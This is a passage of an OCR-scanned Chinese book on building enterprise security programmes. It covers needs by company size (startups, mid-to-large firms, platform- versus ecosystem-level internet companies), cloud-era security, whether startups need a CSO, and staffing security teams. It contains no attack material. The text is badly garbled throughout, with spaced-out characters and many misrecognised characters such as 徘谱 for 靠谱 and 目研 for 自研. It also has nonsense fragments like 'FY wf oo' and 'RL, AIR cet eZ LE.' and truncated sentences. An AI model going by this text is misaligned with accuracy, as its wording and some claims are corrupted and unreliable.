个 人 的 话 ， 就 完全 不 用 考 夸 了 ，APT 什 么 的 就 听 一 听 拉 倒 了 。 


流程 什么 的 融 没 必要 去 搞 了 ， 有 什么 需求 ， 口 头 约 束 一 下 。 





- 找 两 篇 用 到 的 开发 语言 的 安全 编程 规范 给 程序 员 看 看 ， 安 全 专家 








们 次 的 SDL 就 不 要 去 退 求 了 ， 那 个 东西 没有 一 堆 安 全 “ 准 ? 专 家 玩 不 起 
来 。 


系统 加 固 什 么 的 ， 网 上 找 两 篇 文章 对 一 下 ， 确 保 没 有 root 直 接 跑 进 


程 ，chmod 777， 管 理 后 台 弱 密码 对 外 这 种 低级 错误 ， 当 然 有 进一步 需 
求 ， 也 可 以 参考 后 面 的 技术 篇 中 的 措施 。 

实惠 一 点 的 ， 找 个 徘 谱 的 白 帽 子 兼职 做 一 下 测试 ， 或 者 众 测 也 
iTe 





是 不 是 觉得 简陋 了 一 点 ?我 估计 很 多 乙方 提供 的 服务 除了 卖 产 品 之 
外 也 不 会 比 这 个 效果 更 好 了 。 不 过 ， 现 在 不 少 创业 公司 是 拿 了 不 小 的 风 
投 的 ， 也 没 那么 寒酸 。 另 外 一 个 很 重要 的 特征 是 ， 创 业 公司 基本 都 上 公 
有 云 了 ， 不 会 自己 再 去 折腾 IDC 那 点 事 ， 所 以 相对 而 言 以 上 措施 中 的 一 
部 分 可 以 等 价 于 ; 


1) 使 用 云 平 台 提供 的 安全 能 力 ， 包 括 各 种 抗 DDoS、WAF、HIDS 


FY 
wf oo 


2) 使 用 市 场 中 第 三 方 安全 厂商 提供 的 安全 能 





具体 怎么 选 怎 么 用 就 不 展开 讲 了 ， 不 过 不 要 因为 迷信 云 平 台 关 于 安 
全 能 力 的 广告 而 自己 不 再 去 设防 ， 毕 竟 针 对 租户 级 的 通用 型 的 安全 方案 
其 履 冀 面 和 防御 的 维度 是 有 限 的 。 


2. 大 中 型 企业 


这 个 层次 对 应 市 场 上 大 多 数 公司 的 安全 需求 ， 它 的 典型 特征 是 ， 业 
务 营 收 的 持续 性 需要 安全 来 保障 。 公 司 愿 意 在 全 安全 上 投入 固定 的 成 

本 ， 通 常 小 于 I 开 总 投入 的 10%， 不 过 这 已 经 不 错 了 。 这 时 候 开 始 有 专职 
的 安全 人 员 或 安全 团队 ， 建 设 上 重视 效果 和 ROI， 会 具备 初步 的 纵深 防 
御 能 力 。 对 应 技术 上 的 需求 为 : 








:L2~L7 中 的 每 一 层 拥有 完整 的 安全 设计 。 


.对 所 有 的 服务 器 、PC 终 端 、 移 动 设备 ， 具 有 统一 集中 的 状态 感 
知 、 安 全 检测 及 防护 能 力 。 


-应 用 层面 细 粒 度 控 制 。 
全 流量 入 侵 检 测 能 力 。 
无 死角 1 天 漏洞 发 现 能 


在 安全 等 级 较 高 的 区 域 建 立 纵深 防御 和 一 定 的 0 天 发 现 能 力 。 





` 初 具 规 模 的 安全 专职 团队 。 





“对 应 用 交付 有 自主 的 评估 和 修补 能 力 。 


:从 IT 服务 层面 建立 必要 的 流程 、 业 务 持续 性 以 及 风 控 应 急 措 施 。 


“对 业务 安全 形成 自己 的 风 控 及 安全 管理 方法 论 。 


:将 难以 自己 实现 的 部 分 外 包 。 


好 像 跟前 面 的 描述 比 一 下 子 抽象 了 ? 是 的 ， 这 个 层级 的 安全 需求 没 
办 法 很 具体 地 量化 。 不 同 的 业务 模式 对 应 的 安全 实现 还 是 有 很 大 的 不 
同 ， 加 上 这 个 区 间 里 的 公司 营 收 规模 可 以 差 很 大 ， 对 应 的 安全 投入 也 可 
以 差 很 多 。 那 什么 样 的 公司 归 入 这 个 区 间 呢 ? 比如 四 大 行 ， 国 内 TOP10 
甚至 TOP5 以 后 的 互联 网 公司 ， 大 量 的 电信 、 人 金融 、 政 府 、 能 源 等 企业 
都 属于 这 个 区 间 ， 但 我 为 什么 不 把 BAT 归 入 这 个 区 间 ? 这 样 的 分 类 岂 不 
是 不 科学 ? 我 之 所 以 这 样 分 类 完全 是 从 安全 建设 的 复杂 度 上 去 考量 的 ， 
而 不 是 从 安全 建设 的 资金 投入 上 去 归 类 的 。 很 多 行业 《比如 金融 ) 的 安 
全 投入 很 大 ， 但 这 些 解决 方案 大 都 是 靠 花 钱 就 能 买 来 的 ， 而 BAT 的 方案 
伦 钱 不 一 定 能 买 得 到 ， 很 多 都 需要 自己 动手 去 打造 ， 对 安全 团队 的 定 
位 、 能 力 和 需求 完全 不 一 样 。 那 BAT 以 外 较 大 的 互联 网 公司 呢 ? 我 觉得 
他 们 会 玩 些 各 自 特 点 的 小 花样 ， 但 是 不 会 进入 大 范围 的 复杂 的 安全 建 
设 ， 这 是 由 公司 的 整体 面 和 业务 决定 的 ， 不 需要 过 分 保障 和 超前 业务 的 
安全 建设 。 














再 往 上 一 层 是 大 型 互联 网 企业 。 


1.5 生态 级 企业 vs 平台 级 企业 安全 建设 的 需求 





生态 级 企业 和 平台 级 企业 之 间 的 安全 建设 需求 不 仅仅 是 量 的 兰 别 而 











主要 差别 表现 在 是 否 大 量 地 进入 自己 造 轮子 的 时 代 ， 即 安全 建设 需 
要 依托 于 目 研 ， 而 非 采 用 商业 解决 方案 或 依赖 于 开源 工具 的 实现 。 


那么 平台 级 公司 和 生态 级 公司 的 区 别 又 在 哪里 ? 从 表象 上 看 ， 生 态 
级 公司 的 大 型 基础 架构 如 果 用 传统 的 安全 方案 几乎 都 无 法 满足 ， 所 以 会 
大 量 的 进入 上 自 研 。 而 平台 级 公司 则 会 依赖 开源 工具 更 多 一 些 ， 不 会 对 所 
有 人 解决 方案 场景 下 的 安全 工具 进行 自 研 。 如 果 有 预算 也 会 优先 投 在 “ 业 
务 安全 ” 侧 ， 比 如 反 坎 诈 平 台 等 等 ， 而 不 会 目 己 去 搞 入 侵 检 测 。 当 然 ， 
这 有 可 能 是 个 伪 命 题 ， 有 可 能 随 着 时 间 的 推移 ， 乙 方 公司 也 开始 提供 具 
有 可 扩展 性 、 能 应 对 分 布 式 架构 的 方案 ， 或 者 当时 间 尺 度 拉 得 长 一 点， 
平台 级 公司 每 年 在 目 研 上 投入 一 点 点 ， 多 年 之 后 也 具备 了 BAT 级 别 的 安 
全 能 力也 并 非 完全 不 可 能 。 不 过 这 些 都 是 理想 状况 ， 现 实 总 是 受到 多 方 
面 因素 制约 的 。 
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第 一 个 因素 是 技术 驱动 在 底层 还 是 在 应 用 层 驱动 业务 。 表 象 上 ， 平 
台 级 公司 和 生态 级 公司 都 是 以 PC 端 Web 服 务 为 入 口 的 平台 应 用 和 以 移动 
端 APP 入 口 的 移动 应 用 。 有 的 依赖 于 一 些 PC 客 户 端 或 移动 端 偏 底层 的 
APP， 但 在 技术 实现 方式 上 ， 平 台 级 公司 更 多 地 直接 使 用 或 少量 修改 开 
源 软件 ， 而 生态 级 公司 的 IT 基础 设施 则 会 类 似 于 Google 的 三 篇 论文 一 
样 ， 不 仅仅 停留 在 使 用 和 少量 修改 ， 而 是 会 进入 自己 造 轮子 的 阶段 。 其 
中 所 造 的 轮子 是 否 对 业界 有 意义 这 种 问题 暂时 不 去 评价 ， 但 对 应 的 安全 
建设 则 反映 出 平台 级 公司 的 安全 主要 围绕 应 用 层面 ， 而 生态 级 公司 的 安 
全 会 覆盖 基础 架构 和 应 用 层面 两 块 。 直 接 使 用 开源 工具 的 部 分 交 给 社区 
去 处 理 ， 自 己 跟 进 打 补 丁 就 行 了 ， 但 如 果 是 自己 开发 的 ， 那 么 就 需要 自 
己 去 解决 一 揽 子 的 安全 问题 ， 比 如 Google 造 了 Android 这 个 轮子 ， 那 
Android 一 系列 的 安全 问题 Google 需 要 自己 解决 ， 比 如 阿里 自己 去 搞 了 
一 个 ODPS， 那 阿里 的 牛人 也 需要 解决 这 个 ， 再 比如 华为 在 物 联网 领域 
造 了 LiteOS 这 个 轮子 ， 自 然 也 要 去 处 理 对 应 的 问题 ， 而 这 些 偏 底层 的 问 
题 显然 早已 超出 应 用 安全 的 范畴 ， 也 不 是 一 般 的 甲 方 安全 团队 有 能 力 应 
对 的 。 其 实 有 些 平 台 级 公司 也 是 发 明了 一 些 轮子 的 ， 比 如 自动 化 运 维 工 
有 具 ， 比 如 一 些 NOSQL， 不 过 IDC 规 模 两 者 之 间 仍 然 差 得 比较 远 ， 上 层 的 
业务 复杂 度 也 有 差距 ， 文 持 的 研发 团队 的 规模 也 有 兰 距 ， 对 安全 工具 的 
自动 化 能 力 和 数据 处理 规模 仍然 存在 阶梯 级 的 差别 ， 这 一 点 也 决定 了 为 
什么 要 自 研 。 安 全 其 实 只 是 IT 整体 技术 建设 的 一 个 子 集 ， 当 整体 技术 架 
构 和 实现 方式 进入 自 产 自 销 阶段 时 ， 安 全 建设 也 必然 进入 这 个 范畴 。 对 
































于 很 多 实际 上 依 徘 业 务 和 线 下 资源 驱动 而 非 搁 术 驱动 的 互联 网 公司 而 
言 ， 安 全 建设 去 做 太 多 高 大 上 的 事情 显然 是 没有 必要 的 。 








第 二 个 因素 是 钱 ， 钱 也 分 为 两 个 方面 : 1) 成 本 ; 2) ROI。 假 设 安 
全 投入 按 代 忌 投 入 的 固定 10% 算 ， 义 假设 生态 级 公司 的 安全 建设 成 本 是 
平台 级 公司 的 5~10 倍 ， 这 个 成 本 除了 市 完 、IDC 服 务 嚣 软 便 件 之 外 ， 还 
有 技术 团队 ， 加 起 来 才 是 总 拥有 成 本 TCO。10 个 人 的 安全 团队 和 100 个 
人 的 安全 团队 能 做 的 事情 相 莽 太 大 ， 具 体 可 以 参考 我 在 知 乎 上 的 帖 
子 “ 为 什么 从 事 信息 安全 行业 一 定 要 去 大 公司 ? ”。 还 有 一 方面 则 类 似 
于 “去 IOE”， 上 面 提 到 目前 对 于 大 型 互联 网 没有 合适 的 安全 解决 方案 ， 
即使 有 ， 这 个 成 本 可 能 也 会 无 法 接受 ， 所 以 假如 乙方 公司 能 推出 既 能 
撑 业 务 规模 ， 又 具有 性 价 比 的 方案 ， 我 认为 甲 方 安全 团队 真 的 没有 必要 
再 去 造 轮子 了 。 

















第 三 个 因素 是 人 。 安 全 团队 的 人 员 数 量 也 只 是 一 个 很 表面 的 数字 ， 
安全 团队 的 构成 才 是 实力 ， 能 围 到 大 牛 的 安全 团队 和 由 初级 工程 师 组 成 
的 安全 团队 显然 是 不 一 样 的 ， 首 先前 者 的 成 本 不 是 所 有 的 公司 都 能 接 
受 ， 其 次 ,平台 不 够 大 即使 大 牛 来 了 也 未 必 有 用 武之 地 。 大 多 数 平台 级 
公司 中 安全 团队 的 知识 和 经 验 集中 在 Web/App、 应 用 层 协 议 、Web 容 
锅 、 中 间 件 和 数据 库 ， 生 态 级 公司 则 扩展 至 系统 后 屋 、 二 进 制 、 运 行 时 
环境 和 内 核 级 别 ， 能 力 积累 也 存在 差别 。 这 里 并 无 寄 贬 之 意 ， 仅 在 说 明 
业务 对 技术 的 需求 不 一 样 。 











3. 平 台 级 公司 的 “止步 ”局 





那么 ， 平 台 级 公司 在 安全 建设 上 是 不 是 就 没有 乐趣 昵 ? 其 实 这 类 公 
司 也 玩 一 些小 花样 ， 比 如 修改 SSHD、LVS， 加 入 一 些 安全 特性 。 可 能 
也 会 自己 定制 一 个 WAF， 或 者 搞 搞 日 志 的 大 数据 分 析 。 但 比如 涉及 
DPI、 全 流量 入 侵 检 测 、SDN、 内 核 级 别 的 安全 机 制 ， 基 本 上 都 不 会 介 
入 ， 对 于 一 个 规模 不 是 特别 大 的 平台 级 公司 的 甲 方 安全 团队 而 言 ， 这 些 
门槛 还 是 有 点 高 。 
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生态 级 公司 是 不 是 全 领域 进军 自己 造 轮子 呢 ? 也 不 是 ， 主 要 工作 还 
是 在 入 侵 检 测 、WAF、 扫 描 器 、 抗 DDoS、 日 志 分 析 等 领域 。 在 SDL 环 
市 上 可 能 也 会 自己 研发 些 工 具 ， 但 很 与 比 直 接 使 用 商业 工具 更 短平快 。 
阿里 钱 盾 、 腾 讯 管家 、 百 度 杀毒 这 些 都 跟 360 客 户 端 一 样 与 生产 网 络 没 
什么 关系 ， 就 不 去 讲 了 。 另 外 自 研 工具 有 一 个 原则 : 都 限定 在 “民用 ” 领 
域 ， 不 会 自己 去 发 明 一 个 RSA 算 法 这 样 的 东西 。 

















国内 的 平台 级 公司 里 也 有 一 个 例外 : 数字 公司 ， 因 为 其 主 营业 务 是 
信息 安全 ， 所 以 就 没有 安全 投资 固定 占 比 理论 的 影响 。 


16 云 环境 下 的 安全 变迁 





云 计算 的 本 质 是 改变 企业 需求 方 通过 传统 的 渠道 获取 IT 资源 的 形 
式 。 传 统 的 方式 是 一 个 企业 假如 要 构建 信息 化 的 能 力 ， 必 须要 采购 硬 
件 ， 采 购 软件 ， 维 护 一 个 较 大 的 开 团 队 ，TCO 很 高 。 但 是 ， 到 了 云 计 算 
时 代 ， 这 一 切 你 都 不 需要 ， 你 只 要 轻 点 鼠标 就 可 以 获取 大 量 的 计算 、 存 
储 和 网 络 资源 ， 并 且 不 再 需要 专门 的 人 员 去 IDC 机 房 维护 服务 器 ， 不 需 
要 大 量 的 运 维 人 员 ， 甚 至 某 些 通用 的 应 用 开发 都 省 了 ， 你 可 以 将 手头 的 
IT 预算 用 于 最 需要 的 部 分 一 完全 聚焦 于 自己 的 业务 ， 而 不 用 费 大 量 的 精 
力 维 护 基 础 设施 ， 甚 至 资源 的 获取 变 得 弹性 : 需要 时 轻易 获取 大 量 其 至 
海量 的 计算 资源 ， 用 完 后 可 以 及 时 释放 ， 不 用 担心 资产 闲置 和 老化 。 在 
IT 产 业 的 销售 模式 中 被 颠 履 的 一 环 是 ， 传 统 企业 不 再 直接 购买 服务 器 存 
储 商业 数据 库 ， 而 是 通过 云 计 算 平台 获取 。 同 样 地 安全 到 了 云 计 算 时 
代 ， 企 业 客户 会 更 希望 通过 云 化 的 方式 来 获取 和 整合 安全 的 解决 方案 ， 
例如 SaaS (Security as a Service) ， 这 就 要 求 安全 产品 或 解决 方案 本 身 
需要 支持 虚拟 化 、 软 件 化 、 分 布 式 、 可 扩展 性 ， 并 且 利 用 大 数据 和 人 工 
智能 ， 利 用 云端 无 限 的 计算 和 存储 能 力 ， 绥 解 传统 安全 解决 方案 中 数据 
的 离散 、 单 点 的 计算 能 容 不 足 ， 信 息 孤 岛 和 无 法 联动 等 问题 。 














1. 云 的 租户 


对 使 用 云 的 租户 而 言 ， 云 平台 目 身 以 及 应 用 超市 Marketplace《〈 关 似 
APP store) 集成 了 各 个 安全 厂商 的 云 安 全 产品 以 及 可 托管 的 安全 专家 服 
务 。 如 果 目 身 没 有 太 强 烈 地 要 主导 安全 实践 的 意愿 ， 通 常情 况 下 通过 应 
用 超市 和 云 平 台 人 免费 提 供 的 安全 功能 束 可 以 快速 构建 基础 的 安全 能 
如 有 果 和 希望 得 到 进 阶 的 安全 防护 ， 则 必须 目 己 进一步 动手 。 


2. 云 安全 提供 商 





在 传统 的 安全 方 采 中 ， 安 全 厂商 以 提供 硬件 安全 产品 和 安全 服务 为 
主 ， 而 在 云 环境 下 ， 硬 件 形 式 的 安全 方案 会 越 来 越 不 合拍 ， 与 之 相 比 ， 
把 苋 争 力 构 建 在 软件 层面 的 安全 方案 会 成 为 云 上 的 主流 。 相 比 过 去 面 对 
面 提供 安全 服务 ， 现 在 则 转变 为 在 租户 侧 部 署 各 种 安全 传 感 占 ， 通 过 在 
云 问 汇 聚 安全 度量 数据 ， 结 合 威胁 情报 或 由 专家 解读 数据 来 提供 可 管理 
的 一 站 式 安全 服务 。 


第 2 半 ”安全 的 组 织 


很 多 人 忽略 组 织 ， 但 实际 上 组 织 是 比 技术 和 流程 更 重要 的 东 
西 ,，“ 人 ”是 所 有 问题 的 决定 性 因素 。 本 章 就 讲 一 下 安全 组 织 中 的 人 。 


21 创业 型 企业 一 定 需 要 CSO 吗 





1. 招 聘 方 的 诉求 


当下 不 少 创业 型 公司 都 在 找 CSO， 也 有 找到 我 的 ， 就 顺带 分 享 一 下 
我 对 这 个 问题 的 思考 。 首 先 这 个 问题 即便 是 对 同一 个 人 而 言 可 能 答案 也 
会 因 时 而 变 ， 其 次 CSO 只 是 一 个 代表 性 的 称呼 ， 大 家 不 要 过 于 纠结 一 定 
要 做 什么 事 才 算 CSO，CSO 和 CISO 又 有 什么 区 别 之 类 的 ， 在 这 个 语 境 下 
用 来 指 代 招聘 方 想 找 拥 有 全 局 安全 管理 经 验 的 人 ， 甚 至 最 好 是 资深 的 从 
业者 ， 他 能 带 一 支 哪 介 是 几 个 人 的 安全 团队 ， 并 能 把 安全 相关 的 事 全 部 
WIE. 














2. 不 同 阶段 的 需求 





对 于 尚 在 天 使 融资 阶段 ， 找 个 CSO 大 多 就 是 去 忽悠 投资 人 的 ， 通 俗 
一 点 理解 就 是 凑 一 文 履 历 光 鲜 的 队伍 去 “ 骗 钱 "。 能 不 能 做 事情 这 个 很 难 
说 ， 也 不 能 说 人 家 一 定做 不 了 事情 ， 这 种 只 能 事后 诸多 之 的 盖 杞 定论 ， 
随便 说 人 不 靠 谱 也 征 不 负责 任 的， 不 过 我 想 对 于 大 多 数 有 不 错 岗 位 的 人 
而 言 应 该 是 不 会 去 的 。 








对 于 合 到 A 轮 、B 轮 投资 的 阶段 ， 业 务 方 向 已 被 证 明 ， 业 务 量 不 大 
但 进入 快速 成 长 期 ， 问 题 层 出 不 穷 。CEO 和 CTO 觉 得 头疼 并 且 想 把 这 部 





分 压力 转 尹 出 去 ， 理 论 上 有 是 应 该 找 一 个 懂 安 全 的 人 的 ， 但 是 现在 这 个 时 
间 点 《也 就 是 2016 年 ) 真 的 不 是 一 个 好 时 间 ， 在 当下 很 多 公司 用 数 百 万 
也 经 常 找 不 到 合适 的 CSO， 创 业 型 公司 要 在 这 个 时 间 点 上 争夺 安全 人 才 
真 的 是 很 累 的 一 件 事 。 建 议 找 2~3 个 徘 详 的 安全 工程 师 ， 然 后 CTO 技 
术 总 监 ) 、 运 维 Leader、 开 发 的 架构 师 这 几 个 角色 快速 补 一 点 安全 的 知 
识 和 方法 论 ， 哪 但是 充当 救火 队长 赶 鸭子 上 架 ， 大 家 配合 一 下 ， 应 该 也 
能 把 安全 撑 起 来 ， 不 一 定 非 要 找 一 个 大 牛 级 的 CSO， 因 为 有 时 候 业 务 量 
没 那么 大 规模 ， 不 一 定 需要 很 高 级 别 的 人 ， 且 创业 型 公司 为 了 保持 目 己 
的 鲜 活 也 不 需要 套用 大 公司 的 流程 和 方法 ， 做 好 基础 的 运 维 安全 ， 代 码 
安全 ， 加 强 一 些 安全 意识 ， 不 出 问题 的 时 候 腾 出 时 间 来 研究 一 下 下 一 步 
怎么 做 ， 跟 时 间 和 业务 增长 速度 赛跑 ， 跑 着 跑 痢 ， 应 该 就 会 越 来 越 轻松 
了 。 当 然 ， 作 为 创业 者 ， 如 果 你 有 一 个 安全 领域 的 朋友 愿意 帮 你 出 谋划 
朱 ， 侦 尔 回 答 一 下 安全 建设 如 何 做 这 类 问题 ， 其 实 那 CSO 的 需求 也 就 解 
RL, AIR cet eZ LE. 

















对 于 拿 到 C 轮 、D 轮 、E 轮 投资 的 阶段 ， 业 务 初 具 规 模 ， 开 始 朝 更 高 
的 目标 冲刺 ， 同 时 能 给 人 男 更 多 的 “ 饼 ”， 如 宁 之 前 已 经 招 到 靠 详 的 安全 
工程 师 ， 那 这 个 时 候 应 该 已 经 成 长 起 来 ， 承 担 起 Leader 的 角色 ， 通 常 也 
不 需要 从 外 部 招 CSO 了 。 这 个 时 候 想 从 外 部 招 CSO 的 都 是 之 前 主观 的 或 
被 迫 的 不 太 重 视 安 全 ， 出 了 问题 才 想 要 头痛 医 头 脚 痛 医 脚 。 这 个 时 候 的 
业务 形态 跟 大 公司 比 应 该 是 “ 麻 仅 虽 小 五 脏 俱 全 ”， 安 全 省 理 上 应 该 是 有 
很 多 相似 的 地 方 了 ， 对 于 初 具 规模 的 业务 而 言 安 全 管理 的 经 验 很 重要 ， 





可 以 直接 从 大 公司 控 人 。 当 然 了 级 别 较 高 的 人 估计 还 是 挖 不 动 的 ， 能 控 
动 的 主要 就 是 骨干 那 一 层 的 人 吧 。 通 名 你 需要 容 八 他 们 业务 上 有 深度 但 
不 一 定 面面俱到 ， 很 可 能 情商 和 管理 能 力也 差强人意 ， 不 过 能 解决 你 的 
问题 就 行 ， 面 面 俱 到 的 人 才 毕 竟 还 是 太 贵 了。 对 于 那些 估 值 超过 100 亿 
美元 的 创业 型 公司 ， 还 是 建议 找 高 端 人 才 。 








对 于 准备 冲 IPO 的 阶段 ， 这 个 时 候 想 必 不 会 时 中 羞涩 ， 如 果 你 是 这 
类 公司 的 CXO， 还 为 找 不 到 人 感慨 万 千 ， 我 想 也 许 是 心态 还 不 够 开放 ， 
亦 或 许 是 给 人 的 “诚意 ”还 不 够 ， 对 此 我 也 给 不 了 太 多 建议 了 ， 毕 竟 市 场 
上 高 级 人 才 只 有 那么 一 人 小报 人 ， 来 不 来 ， 去 不 去 取决 于 那 一 小 振 人 的 意 
愿 ， 被 打动 了 目 然 来 ， 没 说 打动 的 自然 不 去 。 





3. 创 业 型 企业 的 挑战 


对 选择 转 会 的 CSO 去 创业 公司 是 否 有 挑战 ? 有 ， 也 没有 。 首 先 做 的 
事情 往往 还 是 从 头 建 团 队 ， 把 过 去 建设 安全 体系 的 过 程 从 零 开始 再 做 一 
氨 ， 从 这 个 角度 讲 重 复 过 去 做 的 事情 尽管 业务 有 所 不 同 但 过 程 和 结果 上 
未 必 有 挑战 。 有 ”挑战 ?的 反而 是 如 何在 创业 公司 的 条 件 下 招 码 成 员 ， 维 
系 团 队 ， 在 很 多 流程 及 界限 不 分 明 的 情况 下 推动 事情 落地 ， 仅 此 而 已 。 
对 CSO 本 人 而 言 得 到 的 实践 机 会 未 必 有 大 公司 多 而 三， 因为 安全 是 一 个 
随 企 业 规模 而 复杂 化 的 工作 。 但 是 ， 如 果 你 是 CSO 的 跟班 小 弟 ， 那 你 可 
能 是 成 长 最 快 得 到 锻炼 最 多 的 人 ， 因 为 你 经 历 了 安全 建设 从 无 到 有 飞速 











发 展 ， 从 简单 到 上 自动 化 的 过 程 ， 这 个 过 程 不 是 人 人 都 能 经 历 的 ， 如 果 你 
进入 BAT 在 一 个 很 细 的 分 文 上 耕耘 几 年 未 必 能 积累 到 这 种 “全 局 视野 ”， 

相反 在 这 种 环境 下 才能 快速 积累 。 所 以 除非 公司 IPO，CSO 都 不 是 团队 
里 收益 最 大 的 人 ， 但 跟班 小 弟 却 是 最 大 的 顾家 。 





2.2 Wev- eR 


如 末 要 去 一 家 公司 领衔 安全 建设 ， 第 一 个 问题 就 是 如 何 建 立 安全 团 
队 。 上 面 提 到 不 同 的 公司 状况 对 应 的 安全 建设 需求 是 不 一 样 的 ， 需 要 的 
安全 团队 也 是 不 一 样 的 ， 所 以 我 按 不 同 的 场景 来 深入 分 析 这 个 问题 。 











在 目前 国内 的 市 场 中 ，BAT 这 种 公司 基本 是 不 需要 组 团队 的 ， 对 安 
全 负责 人 有 需求 的 公司 大 约 是 从 准 生 态 级 互联 网 公司 、 平 台 级 互联 网 公 
司 、 大 型 集团 的 互联 网 +， 到 千 干 万 万 的 互联 网 创业 型 公司 。 








1. 极 客 团 队 


如 果 你 在 一 个 小 型 极 客 型 团队 ， 例 如 Youtube 被 Google 收 购 前 只 有 
17 个 人 ， 在 这 样 的 公司 里 你 自己 就 是 安全 团队 ， 俗 称 “one man army”. 
此 时 一 切 头衔 皆 浮云 ， 需 要 的 只 是 一 个 全 栈 工程 师 。 





2. 创 业 型 企业 





对 于 绝 大 多 数 创 业 型 企业 而 言 ， 就 像 之 前 所 说 的 ，CSO 不 一 定 需 
要 ， 你 拉 两 个 小 伙伴 一 起 去 干 活 束 行 了 ， 今 天 BAT 的 安全 总 监 们 ， 当 年 
也 都 是 干 活 的 工程 师 小 伙伴 ，10 多 年 过 去 了 ， 工 程 师 获 成 了 “CSO 大 
叔 ”。 当 你 的 公司 变 成 BAT 时 ， 只 要 你 成 长 得 够 快 ， 也 许 下 一 个 “CSO 大 


DWE TEA Eo 


3. 不 同 的 能 力 类 开 


搞 安 全 的 人 现在 其 实 不 好 招 ， 很 多 企业 都 招 不 到 安全 负责 人 ， 上 所 以 
会 有 一 堆 没 有 甲 方 安全 实 操 经 验 或 者 没有 整体 安全 经 验 的 人 被 推 上 安全 
团队 领导 的 岗位 。 对 绝 大 多 数 公司 而 言 ， 安 全 建设 的 需求 部 是 聚焦 于 应 
用 的 ， 所 以 安全 团队 必然 也 是 需要 偏 网 络 和 应 用 的 人 。 大 牛 显 然 是 没 必 
要 的 ， 而 慌 渗 透 ， 有 一 定 网 络 系统 应 用 攻防 理论 基础 的 人 是 最 具 培 养 价 
值 的 。 除 此 之 外 乙方 的 咨询 顾问 、 搞 安全 标准 的 、 售 前 售后 等 在 这 个 场 
景 下 的 培养 成 本 都 很 高 ， 不 具有 短期 ROI， 所 以 都 不 会 是 潜在 的 候选 
者 。 在 安全 技术 领域 里 ， 其 实 只 有 两 类 人 会 有 长 期 发 展 潜力 : 第 一 类 是 
酷爱 攻防 的 人 ， 对 绕 过 与 阻 电 有 着 天 生 的 兴趣 ;第 二 类 就 是 可 能 不 是 很 
热爱 安全 ， 但 是 CS 基础 极 好 的 程序 员 ， 这 一 类 人 放 哪 里 都 是 牛人 ， 第 
一 类 则 跟 行业 相关 。 粗 俗 一 点 儿 的 次 法 找 几 个 小 黑客 就 能 做 企业 安全 
了 ? 这 种 观 氮 是 不 是 有 人 会 觉得 俩 科 的 历 害 了 。 确 实 我 也 认为 会 渗透 跟 
做 企业 安全 的 系统 性 建设 之 间 还 是 有 比较 大 的 鸿沟 的 。 仅 仅 是 说 在 有 限 
选择 的 情况 下 ， 假 如 你 不 像 某 些 土豪 公司 一 样 随 便 就 能 招 到 高 手 ， 那 么 
可 选 的 蕉 代 方 采 中 最 有 其 可 行 性 和 性 价 比 的 是 什么 ， 之 所 以 选 会 渗透 懂 攻 
防 的 人 ， 那 是 因为 这 类 人 具备 了 在 实践 层面 而 不 是 理论 层面 真正 理解 安 
全 工作 的 基础 ， 在 此 基础 上 去 墙 养 是 非常 快 的 ， 琐 略 、 流 程 、 标 准 、 方 
法 论 可 以 慢 慢 学 ， 因 为 这 些 都 不 是 救火 时 最 需要 的 技能 ， 而 是 在 和 平年 























代 且 规模 较 大 的 公司 才 需 要 的 东西 。 看 有 些 公 司 的 招聘 工程 师 的 要 求 里 
还 写 着 要 证 书 什 么 的 ， 不 蔡 感 慨 一 下 ， 很 多 能 做 事 的 “少年 ”其 实 根 本 没 
有 证 书 ， 有 证 书 的 人 通常 适合 去 做 乙方 的 售 前 而 不 是 甲 方 的 安全 工程 

师 。 甲 方 招聘 要 求证 书 的 ， 基 本 上 都 是 传统 企业 ， 互 联网 企业 这 么 写 的 
应 该 怀疑 一 下 那里 的 整体 水 平 。 当 然 ， 这 个 次 法 对 安全 负 贡 人 的 招聘 不 
成 立 ， 因 为 国内 的 CTO 很 少 有 恒安 全 的 ， 招 聘 者 其 实 也 不 知道 安全 总 监 
到 压 需 要 哪些 技能 ， 随 便 拷贝 了 一 个 也 很 正常 ， 高 端 职位 的 JD〔 职 位 摘 
述 ) 很 多 时 候 都 是 模糊 的 ， 除 了 一 个 头衔 之 外 ， 其 他 都 要 聊 了 才 知 着 ， 

这 时 候 你 就 不 要 去 嫌弃 怎么 写 的 这 么 差 ， 毕 葛 老 板 也 不 慌 这 事 该 上 怎么 


做 ， 找 你 束 是 为 了 解决 这 个 问题 。 














单纯 攻防 型 的 人 在 前 期 培养 比较 快 ， 但 当 安 全 团队 随 着 公司 规模 和 
业务 快速 成 长 时 ， 思 维 过 于 单 点 的 人 可 能 会 出 现 * 瓶 颈 ?”。 后 面 会 提 到 安 
全 建设 实际 上 是 分 阶段 的 ， 而 且 是 系统 性 的 ， 视 野 和 思路 开阔 的 人 会 从 
工程 师 中 脱 额 出来， 成 为 安全 团队 的 领导 。 


4. 大 型 企业 





对 于 比较 大 型 的 平台 级 公司 而 言 ， 安 全 团队 会 有 些 规模 ， 不 只 是 需 
要 工程 师 ， 还 需要 有 经 验 的 Leader， 必 须要 有 在 运 维 安 全 ，PC 端 Web 应 
用 安全 以 及 移动 器 App 安 全 能 独当一面 的 人 ， 如 果 业 务 安 全 疝 有 空白 地 
融 的 话 ， 还 需要 筹建 业务 安全 团队 。 


5. 超 大 型 企业 


准 生 态 级 公司 建安 全 团队 这 种 需求 比较 少 ， 但 因为 笔者 曾 被 问 及 这 
样 的 问题 ， 所 以 就 把 思考 的 结果 写 出 来 。 对 于 这 种 级 别 的 公司 ， 由 于 其 
业务 线 比 较 长 ， 研 发 团队 规模 通常 也 比较 庞大 ， 整 个 基础 架构 也 构建 于 
类 似 云 计算 的 底层 染 构 之 上 好 且 称 之 为 私有 云 吧 〉 ， 光 有 应 用 安全 的 
人 是 不 够 的 ， 安 全 的 领头 人 必须 目 己 对 企业 安全 理解 够 深 ，Leader 这 一 
级 必须 对 系统 性 的 方法 论 有 足够 的 了 解 。 随 便 举 些 例子 ，1) 在 出 安全 
事件 时 如 果 Leader 的 第 一 反应 是 直接 让 人 上 机 絮 去 但 后 门 的 ，2) 对 运 
维系 统 变更 风险 不 了 解 的 ; 3) 对 在 哪 一 层 做 防御 性 价 比 最 高 不 熟悉 
的 ; 4) 不 明白 救火 和 治 病 的 区 别 的 《这 种 思路 会 一 度 体 现在 提 的 安全 
整改 建议 上 ) ， 诸 如 此 类 的 状态 去 担任 Leader 束 会 比较 吃力 (Leader 上 
面 的 安全 老大 目 然 也 会 很 吃力 ) 。 另 外 Leader 的 路 组 织 沟通 能 力 应 该 比 
